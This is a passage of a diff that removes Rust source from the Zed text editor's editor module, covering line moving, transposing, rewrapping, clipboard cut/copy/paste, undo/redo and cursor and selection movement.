end_row) = consume_contiguous_rows( - &mut contiguous_row_selections, - selection, - &display_map, - &mut selections, - ); - - // Move the text spanned by the row range to be before the line preceding the row range - if start_row.0 > 0 { - let range_to_move = Point::new( - start_row.previous_row().0, - buffer.line_len(start_row.previous_row()), - ) - ..Point::new( - end_row.previous_row().0, - buffer.line_len(end_row.previous_row()), - ); - let insertion_point = display_map - .prev_line_boundary(Point::new(start_row.previous_row().0, 0)) - .0; - - // Don't move lines across excerpts - if buffer - .excerpt_containing(insertion_point..range_to_move.end) - .is_some() - { - let text = buffer - .text_for_range(range_to_move.clone()) - .flat_map(|s| s.chars()) - .skip(1) - .chain(['\n']) - .collect::(); - - edits.push(( - buffer.anchor_after(range_to_move.start) - ..buffer.anchor_before(range_to_move.end), - String::new(), - )); - let insertion_anchor = buffer.anchor_after(insertion_point); - edits.push((insertion_anchor..insertion_anchor, text)); - - let row_delta = range_to_move.start.row - insertion_point.row + 1; - - // Move selections up - new_selections.extend(contiguous_row_selections.drain(..).map( - |mut selection| { - selection.start.row -= row_delta; - selection.end.row -= row_delta; - selection - }, - )); - - // Move folds up - unfold_ranges.push(range_to_move.clone()); - for fold in display_map.folds_in_range( - buffer.anchor_before(range_to_move.start) - ..buffer.anchor_after(range_to_move.end), - ) { - let mut start = fold.range.start.to_point(&buffer); - let mut end = fold.range.end.to_point(&buffer); - start.row -= row_delta; - end.row -= row_delta; - refold_creases.push(Crease::simple(start..end, fold.placeholder.clone())); - } - } - } - - // If we didn't move line(s), preserve the existing selections - new_selections.append(&mut contiguous_row_selections); - } - - self.transact(window, cx, |this, window, cx| { - this.unfold_ranges(&unfold_ranges, true, 
true, cx); - this.buffer.update(cx, |buffer, cx| { - for (range, text) in edits { - buffer.edit([(range, text)], None, cx); - } - }); - this.fold_creases(refold_creases, true, window, cx); - this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select(new_selections); - }) - }); - } - - pub fn move_line_down( - &mut self, - _: &MoveLineDown, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - let buffer = self.buffer.read(cx).snapshot(cx); - - let mut edits = Vec::new(); - let mut unfold_ranges = Vec::new(); - let mut refold_creases = Vec::new(); - - let selections = self.selections.all::(cx); - let mut selections = selections.iter().peekable(); - let mut contiguous_row_selections = Vec::new(); - let mut new_selections = Vec::new(); - - while let Some(selection) = selections.next() { - // Find all the selections that span a contiguous row range - let (start_row, end_row) = consume_contiguous_rows( - &mut contiguous_row_selections, - selection, - &display_map, - &mut selections, - ); - - // Move the text spanned by the row range to be after the last line of the row range - if end_row.0 <= buffer.max_point().row { - let range_to_move = - MultiBufferPoint::new(start_row.0, 0)..MultiBufferPoint::new(end_row.0, 0); - let insertion_point = display_map - .next_line_boundary(MultiBufferPoint::new(end_row.0, 0)) - .0; - - // Don't move lines across excerpt boundaries - if buffer - .excerpt_containing(range_to_move.start..insertion_point) - .is_some() - { - let mut text = String::from("\n"); - text.extend(buffer.text_for_range(range_to_move.clone())); - text.pop(); // Drop trailing newline - edits.push(( - buffer.anchor_after(range_to_move.start) - ..buffer.anchor_before(range_to_move.end), - String::new(), - )); - let insertion_anchor = buffer.anchor_after(insertion_point); - 
edits.push((insertion_anchor..insertion_anchor, text)); - - let row_delta = insertion_point.row - range_to_move.end.row + 1; - - // Move selections down - new_selections.extend(contiguous_row_selections.drain(..).map( - |mut selection| { - selection.start.row += row_delta; - selection.end.row += row_delta; - selection - }, - )); - - // Move folds down - unfold_ranges.push(range_to_move.clone()); - for fold in display_map.folds_in_range( - buffer.anchor_before(range_to_move.start) - ..buffer.anchor_after(range_to_move.end), - ) { - let mut start = fold.range.start.to_point(&buffer); - let mut end = fold.range.end.to_point(&buffer); - start.row += row_delta; - end.row += row_delta; - refold_creases.push(Crease::simple(start..end, fold.placeholder.clone())); - } - } - } - - // If we didn't move line(s), preserve the existing selections - new_selections.append(&mut contiguous_row_selections); - } - - self.transact(window, cx, |this, window, cx| { - this.unfold_ranges(&unfold_ranges, true, true, cx); - this.buffer.update(cx, |buffer, cx| { - for (range, text) in edits { - buffer.edit([(range, text)], None, cx); - } - }); - this.fold_creases(refold_creases, true, window, cx); - this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select(new_selections) - }); - }); - } - - pub fn transpose(&mut self, _: &Transpose, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - let text_layout_details = &self.text_layout_details(window); - self.transact(window, cx, |this, window, cx| { - let edits = this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - let mut edits: Vec<(Range, String)> = Default::default(); - s.move_with(|display_map, selection| { - if !selection.is_empty() { - return; - } - - let mut head = selection.head(); - let mut transpose_offset = head.to_offset(display_map, Bias::Right); - if head.column() == display_map.line_len(head.row()) { - transpose_offset = display_map - 
.buffer_snapshot - .clip_offset(transpose_offset.saturating_sub(1), Bias::Left); - } - - if transpose_offset == 0 { - return; - } - - *head.column_mut() += 1; - head = display_map.clip_point(head, Bias::Right); - let goal = SelectionGoal::HorizontalPosition( - display_map - .x_for_display_point(head, text_layout_details) - .into(), - ); - selection.collapse_to(head, goal); - - let transpose_start = display_map - .buffer_snapshot - .clip_offset(transpose_offset.saturating_sub(1), Bias::Left); - if edits.last().map_or(true, |e| e.0.end <= transpose_start) { - let transpose_end = display_map - .buffer_snapshot - .clip_offset(transpose_offset + 1, Bias::Right); - if let Some(ch) = - display_map.buffer_snapshot.chars_at(transpose_start).next() - { - edits.push((transpose_start..transpose_offset, String::new())); - edits.push((transpose_end..transpose_end, ch.to_string())); - } - } - }); - edits - }); - this.buffer - .update(cx, |buffer, cx| buffer.edit(edits, None, cx)); - let selections = this.selections.all::(cx); - this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select(selections); - }); - }); - } - - pub fn rewrap(&mut self, _: &Rewrap, _: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - self.rewrap_impl(RewrapOptions::default(), cx) - } - - pub fn rewrap_impl(&mut self, options: RewrapOptions, cx: &mut Context) { - let buffer = self.buffer.read(cx).snapshot(cx); - let selections = self.selections.all::(cx); - let mut selections = selections.iter().peekable(); - - let mut edits = Vec::new(); - let mut rewrapped_row_ranges = Vec::>::new(); - - while let Some(selection) = selections.next() { - let mut start_row = selection.start.row; - let mut end_row = selection.end.row; - - // Skip selections that overlap with a range that has already been rewrapped. 
- let selection_range = start_row..end_row; - if rewrapped_row_ranges - .iter() - .any(|range| range.overlaps(&selection_range)) - { - continue; - } - - let tab_size = buffer.language_settings_at(selection.head(), cx).tab_size; - - // Since not all lines in the selection may be at the same indent - // level, choose the indent size that is the most common between all - // of the lines. - // - // If there is a tie, we use the deepest indent. - let (indent_size, indent_end) = { - let mut indent_size_occurrences = HashMap::default(); - let mut rows_by_indent_size = HashMap::>::default(); - - for row in start_row..=end_row { - let indent = buffer.indent_size_for_line(MultiBufferRow(row)); - rows_by_indent_size.entry(indent).or_default().push(row); - *indent_size_occurrences.entry(indent).or_insert(0) += 1; - } - - let indent_size = indent_size_occurrences - .into_iter() - .max_by_key(|(indent, count)| (*count, indent.len_with_expanded_tabs(tab_size))) - .map(|(indent, _)| indent) - .unwrap_or_default(); - let row = rows_by_indent_size[&indent_size][0]; - let indent_end = Point::new(row, indent_size.len); - - (indent_size, indent_end) - }; - - let mut line_prefix = indent_size.chars().collect::(); - - let mut inside_comment = false; - if let Some(comment_prefix) = - buffer - .language_scope_at(selection.head()) - .and_then(|language| { - language - .line_comment_prefixes() - .iter() - .find(|prefix| buffer.contains_str_at(indent_end, prefix)) - .cloned() - }) - { - line_prefix.push_str(&comment_prefix); - inside_comment = true; - } - - let language_settings = buffer.language_settings_at(selection.head(), cx); - let allow_rewrap_based_on_language = match language_settings.allow_rewrap { - RewrapBehavior::InComments => inside_comment, - RewrapBehavior::InSelections => !selection.is_empty(), - RewrapBehavior::Anywhere => true, - }; - - let should_rewrap = options.override_language_settings - || allow_rewrap_based_on_language - || self.hard_wrap.is_some(); - if 
!should_rewrap { - continue; - } - - if selection.is_empty() { - 'expand_upwards: while start_row > 0 { - let prev_row = start_row - 1; - if buffer.contains_str_at(Point::new(prev_row, 0), &line_prefix) - && buffer.line_len(MultiBufferRow(prev_row)) as usize > line_prefix.len() - { - start_row = prev_row; - } else { - break 'expand_upwards; - } - } - - 'expand_downwards: while end_row < buffer.max_point().row { - let next_row = end_row + 1; - if buffer.contains_str_at(Point::new(next_row, 0), &line_prefix) - && buffer.line_len(MultiBufferRow(next_row)) as usize > line_prefix.len() - { - end_row = next_row; - } else { - break 'expand_downwards; - } - } - } - - let start = Point::new(start_row, 0); - let start_offset = start.to_offset(&buffer); - let end = Point::new(end_row, buffer.line_len(MultiBufferRow(end_row))); - let selection_text = buffer.text_for_range(start..end).collect::(); - let Some(lines_without_prefixes) = selection_text - .lines() - .map(|line| { - line.strip_prefix(&line_prefix) - .or_else(|| line.trim_start().strip_prefix(&line_prefix.trim_start())) - .with_context(|| { - format!("line did not start with prefix {line_prefix:?}: {line:?}") - }) - }) - .collect::, _>>() - .log_err() - else { - continue; - }; - - let wrap_column = self.hard_wrap.unwrap_or_else(|| { - buffer - .language_settings_at(Point::new(start_row, 0), cx) - .preferred_line_length as usize - }); - let wrapped_text = wrap_with_prefix( - line_prefix, - lines_without_prefixes.join("\n"), - wrap_column, - tab_size, - options.preserve_existing_whitespace, - ); - - // TODO: should always use char-based diff while still supporting cursor behavior that - // matches vim. 
- let mut diff_options = DiffOptions::default(); - if options.override_language_settings { - diff_options.max_word_diff_len = 0; - diff_options.max_word_diff_line_count = 0; - } else { - diff_options.max_word_diff_len = usize::MAX; - diff_options.max_word_diff_line_count = usize::MAX; - } - - for (old_range, new_text) in - text_diff_with_options(&selection_text, &wrapped_text, diff_options) - { - let edit_start = buffer.anchor_after(start_offset + old_range.start); - let edit_end = buffer.anchor_after(start_offset + old_range.end); - edits.push((edit_start..edit_end, new_text)); - } - - rewrapped_row_ranges.push(start_row..=end_row); - } - - self.buffer - .update(cx, |buffer, cx| buffer.edit(edits, None, cx)); - } - - pub fn cut_common(&mut self, window: &mut Window, cx: &mut Context) -> ClipboardItem { - let mut text = String::new(); - let buffer = self.buffer.read(cx).snapshot(cx); - let mut selections = self.selections.all::(cx); - let mut clipboard_selections = Vec::with_capacity(selections.len()); - { - let max_point = buffer.max_point(); - let mut is_first = true; - for selection in &mut selections { - let is_entire_line = selection.is_empty() || self.selections.line_mode; - if is_entire_line { - selection.start = Point::new(selection.start.row, 0); - if !selection.is_empty() && selection.end.column == 0 { - selection.end = cmp::min(max_point, selection.end); - } else { - selection.end = cmp::min(max_point, Point::new(selection.end.row + 1, 0)); - } - selection.goal = SelectionGoal::None; - } - if is_first { - is_first = false; - } else { - text += "\n"; - } - let mut len = 0; - for chunk in buffer.text_for_range(selection.start..selection.end) { - text.push_str(chunk); - len += chunk.len(); - } - clipboard_selections.push(ClipboardSelection { - len, - is_entire_line, - first_line_indent: buffer - .indent_size_for_line(MultiBufferRow(selection.start.row)) - .len, - }); - } - } - - self.transact(window, cx, |this, window, cx| { - 
this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select(selections); - }); - this.insert("", window, cx); - }); - ClipboardItem::new_string_with_json_metadata(text, clipboard_selections) - } - - pub fn cut(&mut self, _: &Cut, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - let item = self.cut_common(window, cx); - cx.write_to_clipboard(item); - } - - pub fn kill_ring_cut(&mut self, _: &KillRingCut, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - self.change_selections(None, window, cx, |s| { - s.move_with(|snapshot, sel| { - if sel.is_empty() { - sel.end = DisplayPoint::new(sel.end.row(), snapshot.line_len(sel.end.row())) - } - }); - }); - let item = self.cut_common(window, cx); - cx.set_global(KillRing(item)) - } - - pub fn kill_ring_yank( - &mut self, - _: &KillRingYank, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - let (text, metadata) = if let Some(KillRing(item)) = cx.try_global() { - if let Some(ClipboardEntry::String(kill_ring)) = item.entries().first() { - (kill_ring.text().to_string(), kill_ring.metadata_json()) - } else { - return; - } - } else { - return; - }; - self.do_paste(&text, metadata, false, window, cx); - } - - pub fn copy_and_trim(&mut self, _: &CopyAndTrim, _: &mut Window, cx: &mut Context) { - self.do_copy(true, cx); - } - - pub fn copy(&mut self, _: &Copy, _: &mut Window, cx: &mut Context) { - self.do_copy(false, cx); - } - - fn do_copy(&self, strip_leading_indents: bool, cx: &mut Context) { - let selections = self.selections.all::(cx); - let buffer = self.buffer.read(cx).read(cx); - let mut text = String::new(); - - let mut clipboard_selections = Vec::with_capacity(selections.len()); - { - let max_point = buffer.max_point(); - let mut is_first = true; - for selection in &selections { - let mut start = selection.start; - let mut end = 
selection.end; - let is_entire_line = selection.is_empty() || self.selections.line_mode; - if is_entire_line { - start = Point::new(start.row, 0); - end = cmp::min(max_point, Point::new(end.row + 1, 0)); - } - - let mut trimmed_selections = Vec::new(); - if strip_leading_indents && end.row.saturating_sub(start.row) > 0 { - let row = MultiBufferRow(start.row); - let first_indent = buffer.indent_size_for_line(row); - if first_indent.len == 0 || start.column > first_indent.len { - trimmed_selections.push(start..end); - } else { - trimmed_selections.push( - Point::new(row.0, first_indent.len) - ..Point::new(row.0, buffer.line_len(row)), - ); - for row in start.row + 1..=end.row { - let mut line_len = buffer.line_len(MultiBufferRow(row)); - if row == end.row { - line_len = end.column; - } - if line_len == 0 { - trimmed_selections - .push(Point::new(row, 0)..Point::new(row, line_len)); - continue; - } - let row_indent_size = buffer.indent_size_for_line(MultiBufferRow(row)); - if row_indent_size.len >= first_indent.len { - trimmed_selections.push( - Point::new(row, first_indent.len)..Point::new(row, line_len), - ); - } else { - trimmed_selections.clear(); - trimmed_selections.push(start..end); - break; - } - } - } - } else { - trimmed_selections.push(start..end); - } - - for trimmed_range in trimmed_selections { - if is_first { - is_first = false; - } else { - text += "\n"; - } - let mut len = 0; - for chunk in buffer.text_for_range(trimmed_range.start..trimmed_range.end) { - text.push_str(chunk); - len += chunk.len(); - } - clipboard_selections.push(ClipboardSelection { - len, - is_entire_line, - first_line_indent: buffer - .indent_size_for_line(MultiBufferRow(trimmed_range.start.row)) - .len, - }); - } - } - } - - cx.write_to_clipboard(ClipboardItem::new_string_with_json_metadata( - text, - clipboard_selections, - )); - } - - pub fn do_paste( - &mut self, - text: &String, - clipboard_selections: Option>, - handle_entire_lines: bool, - window: &mut Window, - cx: &mut 
Context, - ) { - if self.read_only(cx) { - return; - } - - let clipboard_text = Cow::Borrowed(text); - - self.transact(window, cx, |this, window, cx| { - if let Some(mut clipboard_selections) = clipboard_selections { - let old_selections = this.selections.all::(cx); - let all_selections_were_entire_line = - clipboard_selections.iter().all(|s| s.is_entire_line); - let first_selection_indent_column = - clipboard_selections.first().map(|s| s.first_line_indent); - if clipboard_selections.len() != old_selections.len() { - clipboard_selections.drain(..); - } - let cursor_offset = this.selections.last::(cx).head(); - let mut auto_indent_on_paste = true; - - this.buffer.update(cx, |buffer, cx| { - let snapshot = buffer.read(cx); - auto_indent_on_paste = snapshot - .language_settings_at(cursor_offset, cx) - .auto_indent_on_paste; - - let mut start_offset = 0; - let mut edits = Vec::new(); - let mut original_indent_columns = Vec::new(); - for (ix, selection) in old_selections.iter().enumerate() { - let to_insert; - let entire_line; - let original_indent_column; - if let Some(clipboard_selection) = clipboard_selections.get(ix) { - let end_offset = start_offset + clipboard_selection.len; - to_insert = &clipboard_text[start_offset..end_offset]; - entire_line = clipboard_selection.is_entire_line; - start_offset = end_offset + 1; - original_indent_column = Some(clipboard_selection.first_line_indent); - } else { - to_insert = clipboard_text.as_str(); - entire_line = all_selections_were_entire_line; - original_indent_column = first_selection_indent_column - } - - // If the corresponding selection was empty when this slice of the - // clipboard text was written, then the entire line containing the - // selection was copied. If this selection is also currently empty, - // then paste the line before the current line of the buffer. 
- let range = if selection.is_empty() && handle_entire_lines && entire_line { - let column = selection.start.to_point(&snapshot).column as usize; - let line_start = selection.start - column; - line_start..line_start - } else { - selection.range() - }; - - edits.push((range, to_insert)); - original_indent_columns.push(original_indent_column); - } - drop(snapshot); - - buffer.edit( - edits, - if auto_indent_on_paste { - Some(AutoindentMode::Block { - original_indent_columns, - }) - } else { - None - }, - cx, - ); - }); - - let selections = this.selections.all::(cx); - this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select(selections) - }); - } else { - this.insert(&clipboard_text, window, cx); - } - }); - } - - pub fn paste(&mut self, _: &Paste, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - if let Some(item) = cx.read_from_clipboard() { - let entries = item.entries(); - - match entries.first() { - // For now, we only support applying metadata if there's one string. In the future, we can incorporate all the selections - // of all the pasted entries. - Some(ClipboardEntry::String(clipboard_string)) if entries.len() == 1 => self - .do_paste( - clipboard_string.text(), - clipboard_string.metadata_json::>(), - true, - window, - cx, - ), - _ => self.do_paste(&item.text().unwrap_or_default(), None, true, window, cx), - } - } - } - - pub fn undo(&mut self, _: &Undo, window: &mut Window, cx: &mut Context) { - if self.read_only(cx) { - return; - } - - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - - if let Some(transaction_id) = self.buffer.update(cx, |buffer, cx| buffer.undo(cx)) { - if let Some((selections, _)) = - self.selection_history.transaction(transaction_id).cloned() - { - self.change_selections(None, window, cx, |s| { - s.select_anchors(selections.to_vec()); - }); - } else { - log::error!( - "No entry in selection_history found for undo. 
\ - This may correspond to a bug where undo does not update the selection. \ - If this is occurring, please add details to \ - https://github.com/zed-industries/zed/issues/22692" - ); - } - self.request_autoscroll(Autoscroll::fit(), cx); - self.unmark_text(window, cx); - self.refresh_inline_completion(true, false, window, cx); - cx.emit(EditorEvent::Edited { transaction_id }); - cx.emit(EditorEvent::TransactionUndone { transaction_id }); - } - } - - pub fn redo(&mut self, _: &Redo, window: &mut Window, cx: &mut Context) { - if self.read_only(cx) { - return; - } - - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - - if let Some(transaction_id) = self.buffer.update(cx, |buffer, cx| buffer.redo(cx)) { - if let Some((_, Some(selections))) = - self.selection_history.transaction(transaction_id).cloned() - { - self.change_selections(None, window, cx, |s| { - s.select_anchors(selections.to_vec()); - }); - } else { - log::error!( - "No entry in selection_history found for redo. \ - This may correspond to a bug where undo does not update the selection. 
\ - If this is occurring, please add details to \ - https://github.com/zed-industries/zed/issues/22692" - ); - } - self.request_autoscroll(Autoscroll::fit(), cx); - self.unmark_text(window, cx); - self.refresh_inline_completion(true, false, window, cx); - cx.emit(EditorEvent::Edited { transaction_id }); - } - } - - pub fn finalize_last_transaction(&mut self, cx: &mut Context) { - self.buffer - .update(cx, |buffer, cx| buffer.finalize_last_transaction(cx)); - } - - pub fn group_until_transaction(&mut self, tx_id: TransactionId, cx: &mut Context) { - self.buffer - .update(cx, |buffer, cx| buffer.group_until_transaction(tx_id, cx)); - } - - pub fn move_left(&mut self, _: &MoveLeft, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_with(|map, selection| { - let cursor = if selection.is_empty() { - movement::left(map, selection.start) - } else { - selection.start - }; - selection.collapse_to(cursor, SelectionGoal::None); - }); - }) - } - - pub fn select_left(&mut self, _: &SelectLeft, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_heads_with(|map, head, _| (movement::left(map, head), SelectionGoal::None)); - }) - } - - pub fn move_right(&mut self, _: &MoveRight, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_with(|map, selection| { - let cursor = if selection.is_empty() { - movement::right(map, selection.end) - } else { - selection.end - }; - selection.collapse_to(cursor, SelectionGoal::None) - }); - }) - } - - pub fn select_right(&mut self, _: &SelectRight, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - 
self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_heads_with(|map, head, _| (movement::right(map, head), SelectionGoal::None)); - }) - } - - pub fn move_up(&mut self, _: &MoveUp, window: &mut Window, cx: &mut Context) { - if self.take_rename(true, window, cx).is_some() { - return; - } - - if matches!(self.mode, EditorMode::SingleLine { .. }) { - cx.propagate(); - return; - } - - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - - let text_layout_details = &self.text_layout_details(window); - let selection_count = self.selections.count(); - let first_selection = self.selections.first_anchor(); - - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_with(|map, selection| { - if !selection.is_empty() { - selection.goal = SelectionGoal::None; - } - let (cursor, goal) = movement::up( - map, - selection.start, - selection.goal, - false, - text_layout_details, - ); - selection.collapse_to(cursor, goal); - }); - }); - - if selection_count == 1 && first_selection.range() == self.selections.first_anchor().range() - { - cx.propagate(); - } - } - - pub fn move_up_by_lines( - &mut self, - action: &MoveUpByLines, - window: &mut Window, - cx: &mut Context, - ) { - if self.take_rename(true, window, cx).is_some() { - return; - } - - if matches!(self.mode, EditorMode::SingleLine { .. 
}) { - cx.propagate(); - return; - } - - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - - let text_layout_details = &self.text_layout_details(window); - - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_with(|map, selection| { - if !selection.is_empty() { - selection.goal = SelectionGoal::None; - } - let (cursor, goal) = movement::up_by_rows( - map, - selection.start, - action.lines, - selection.goal, - false, - text_layout_details, - ); - selection.collapse_to(cursor, goal); - }); - }) - } - - pub fn move_down_by_lines( - &mut self, - action: &MoveDownByLines, - window: &mut Window, - cx: &mut Context, - ) { - if self.take_rename(true, window, cx).is_some() { - return; - } - - if matches!(self.mode, EditorMode::SingleLine { .. }) { - cx.propagate(); - return; - } - - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - - let text_layout_details = &self.text_layout_details(window); - - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_with(|map, selection| { - if !selection.is_empty() { - selection.goal = SelectionGoal::None; - } - let (cursor, goal) = movement::down_by_rows( - map, - selection.start, - action.lines, - selection.goal, - false, - text_layout_details, - ); - selection.collapse_to(cursor, goal); - }); - }) - } - - pub fn select_down_by_lines( - &mut self, - action: &SelectDownByLines, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - let text_layout_details = &self.text_layout_details(window); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_heads_with(|map, head, goal| { - movement::down_by_rows(map, head, action.lines, goal, false, text_layout_details) - }) - }) - } - - pub fn select_up_by_lines( - &mut self, - action: &SelectUpByLines, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - let 
text_layout_details = &self.text_layout_details(window); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_heads_with(|map, head, goal| { - movement::up_by_rows(map, head, action.lines, goal, false, text_layout_details) - }) - }) - } - - pub fn select_page_up( - &mut self, - _: &SelectPageUp, - window: &mut Window, - cx: &mut Context, - ) { - let Some(row_count) = self.visible_row_count() else { - return; - }; - - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - - let text_layout_details = &self.text_layout_details(window); - - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_heads_with(|map, head, goal| { - movement::up_by_rows(map, head, row_count, goal, false, text_layout_details) - }) - }) - } - - pub fn move_page_up( - &mut self, - action: &MovePageUp, - window: &mut Window, - cx: &mut Context, - ) { - if self.take_rename(true, window, cx).is_some() { - return; - } - - if self - .context_menu - .borrow_mut() - .as_mut() - .map(|menu| menu.select_first(self.completion_provider.as_deref(), cx)) - .unwrap_or(false) - { - return; - } - - if matches!(self.mode, EditorMode::SingleLine { .. 
}) { - cx.propagate(); - return; - } - - let Some(row_count) = self.visible_row_count() else { - return; - }; - - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - - let autoscroll = if action.center_cursor { - Autoscroll::center() - } else { - Autoscroll::fit() - }; - - let text_layout_details = &self.text_layout_details(window); - - self.change_selections(Some(autoscroll), window, cx, |s| { - s.move_with(|map, selection| { - if !selection.is_empty() { - selection.goal = SelectionGoal::None; - } - let (cursor, goal) = movement::up_by_rows( - map, - selection.end, - row_count, - selection.goal, - false, - text_layout_details, - ); - selection.collapse_to(cursor, goal); - }); - }); - } - - pub fn select_up(&mut self, _: &SelectUp, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - let text_layout_details = &self.text_layout_details(window); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_heads_with(|map, head, goal| { - movement::up(map, head, goal, false, text_layout_details) - }) - }) - } - - pub fn move_down(&mut self, _: &MoveDown, window: &mut Window, cx: &mut Context) { - self.take_rename(true, window, cx); - - if matches!(self.mode, EditorMode::SingleLine { .. 
}) { - cx.propagate(); - return; - } - - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - - let text_layout_details = &self.text_layout_details(window); - let selection_count = self.selections.count(); - let first_selection = self.selections.first_anchor(); - - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_with(|map, selection| { - if !selection.is_empty() { - selection.goal = SelectionGoal::None; - } - let (cursor, goal) = movement::down( - map, - selection.end, - selection.goal, - false, - text_layout_details, - ); - selection.collapse_to(cursor, goal); - }); - }); - - if selection_count == 1 && first_selection.range() == self.selections.first_anchor().range() - { - cx.propagate(); - } - } - - pub fn select_page_down( - &mut self, - _: &SelectPageDown, - window: &mut Window, - cx: &mut Context, - ) { - let Some(row_count) = self.visible_row_count() else { - return; - }; - - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - - let text_layout_details = &self.text_layout_details(window); - - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_heads_with(|map, head, goal| { - movement::down_by_rows(map, head, row_count, goal, false, text_layout_details) - }) - }) - } - - pub fn move_page_down( - &mut self, - action: &MovePageDown, - window: &mut Window, - cx: &mut Context, - ) { - if self.take_rename(true, window, cx).is_some() { - return; - } - - if self - .context_menu - .borrow_mut() - .as_mut() - .map(|menu| menu.select_last(self.completion_provider.as_deref(), cx)) - .unwrap_or(false) - { - return; - } - - if matches!(self.mode, EditorMode::SingleLine { .. 
}) { - cx.propagate(); - return; - } - - let Some(row_count) = self.visible_row_count() else { - return; - }; - - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - - let autoscroll = if action.center_cursor { - Autoscroll::center() - } else { - Autoscroll::fit() - }; - - let text_layout_details = &self.text_layout_details(window); - self.change_selections(Some(autoscroll), window, cx, |s| { - s.move_with(|map, selection| { - if !selection.is_empty() { - selection.goal = SelectionGoal::None; - } - let (cursor, goal) = movement::down_by_rows( - map, - selection.end, - row_count, - selection.goal, - false, - text_layout_details, - ); - selection.collapse_to(cursor, goal); - }); - }); - } - - pub fn select_down(&mut self, _: &SelectDown, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - let text_layout_details = &self.text_layout_details(window); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_heads_with(|map, head, goal| { - movement::down(map, head, goal, false, text_layout_details) - }) - }); - } - - pub fn context_menu_first( - &mut self, - _: &ContextMenuFirst, - _window: &mut Window, - cx: &mut Context, - ) { - if let Some(context_menu) = self.context_menu.borrow_mut().as_mut() { - context_menu.select_first(self.completion_provider.as_deref(), cx); - } - } - - pub fn context_menu_prev( - &mut self, - _: &ContextMenuPrevious, - _window: &mut Window, - cx: &mut Context, - ) { - if let Some(context_menu) = self.context_menu.borrow_mut().as_mut() { - context_menu.select_prev(self.completion_provider.as_deref(), cx); - } - } - - pub fn context_menu_next( - &mut self, - _: &ContextMenuNext, - _window: &mut Window, - cx: &mut Context, - ) { - if let Some(context_menu) = self.context_menu.borrow_mut().as_mut() { - context_menu.select_next(self.completion_provider.as_deref(), cx); - } - } - - pub fn context_menu_last( - &mut self, - _: &ContextMenuLast, - _window: &mut 
Window, - cx: &mut Context, - ) { - if let Some(context_menu) = self.context_menu.borrow_mut().as_mut() { - context_menu.select_last(self.completion_provider.as_deref(), cx); - } - } - - pub fn move_to_previous_word_start( - &mut self, - _: &MoveToPreviousWordStart, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_cursors_with(|map, head, _| { - ( - movement::previous_word_start(map, head), - SelectionGoal::None, - ) - }); - }) - } - - pub fn move_to_previous_subword_start( - &mut self, - _: &MoveToPreviousSubwordStart, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_cursors_with(|map, head, _| { - ( - movement::previous_subword_start(map, head), - SelectionGoal::None, - ) - }); - }) - } - - pub fn select_to_previous_word_start( - &mut self, - _: &SelectToPreviousWordStart, - window: &mut Window, - cx: &mut Context, - ) { - 